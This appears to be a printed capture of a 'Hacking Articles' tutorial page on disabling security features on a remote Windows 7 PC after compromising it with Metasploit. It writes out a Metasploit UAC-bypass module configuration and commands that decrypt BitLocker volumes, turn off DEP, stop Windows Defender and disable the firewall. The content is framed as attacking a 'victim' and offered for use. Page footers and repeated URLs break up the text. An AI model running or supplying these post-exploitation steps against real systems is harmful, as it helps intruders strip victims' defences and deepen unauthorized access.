Vous êtes sur la page 1sur 3

Hacking Articles

Hack ALL Security Features in Remote Windows 7


PC
First Hack the Victim PC Using Metasploit (Tutorial How to Hack Remote PC
(http://www.hackingarticles.in/best-of-social-engineering-toolkit-attack/) )
How to Disable UAC protection (Get Admin Access)
From MicrosoftUAC is a security component that allows an administrator to enter credentials during a
non-administrators user session to perform occasional administrative tasks. UAC also can also require
administrators to specifically approve administrative actions or applications before they are allowed to
run.
use exploit/windows/local/bypassuac_injection
msf exploit (bypassuac_injection)>set session 1
msf exploit (bypassuac_injection)>set lhost 192.168.1.6 (IP of Local Host)
msf exploit (bypassuac_injection)>exploit
Once you got the meterpreter session use shell command to get command prompt of the target
How to Check Status and disable bitlocker
From Microsoft BitLocker Drive Encryption allows you to encrypt all data stored on the Windows
operating system volume and configured data volumes, and by using a Trusted Platform Module.
http://www.hackingarticles.in/hack-all-security-features-in-remote-wi...
1 of 3 05/07/2014 10:22
manage-bde -status C: (If Bit locker is enable use following command)
manage-bde -off C:
How to OFF Date Execution Prevention (DEP)
From Microsoft Data Execution Prevention (DEP) is a security feature that can help prevent damage to
your computer from viruses and other security threats. Harmful programs can try to attack Windows by
attempting to run (also known as execute) code from system memory locations reserved for Windows and
other authorized programs. These types of attacks can harm your programs and files.
bcdedit.exe /set {current} nx AlwaysOff
How to Stop Windows Defender Service
Windows Defender is your first line of defense against spyware and other unwanted software.
net stop WinDefend
How to Disable Windows Firewall
Windows Firewall can help protect your PC from hackers and malicious software. In Windows 7
netsh firewall set opmode disable
http://www.hackingarticles.in/hack-all-security-features-in-remote-wi...
2 of 3 05/07/2014 10:22
http://www.hackingarticles.in/hack-all-security-features-in-remote-wi...
3 of 3 05/07/2014 10:22

Vous aimerez peut-être aussi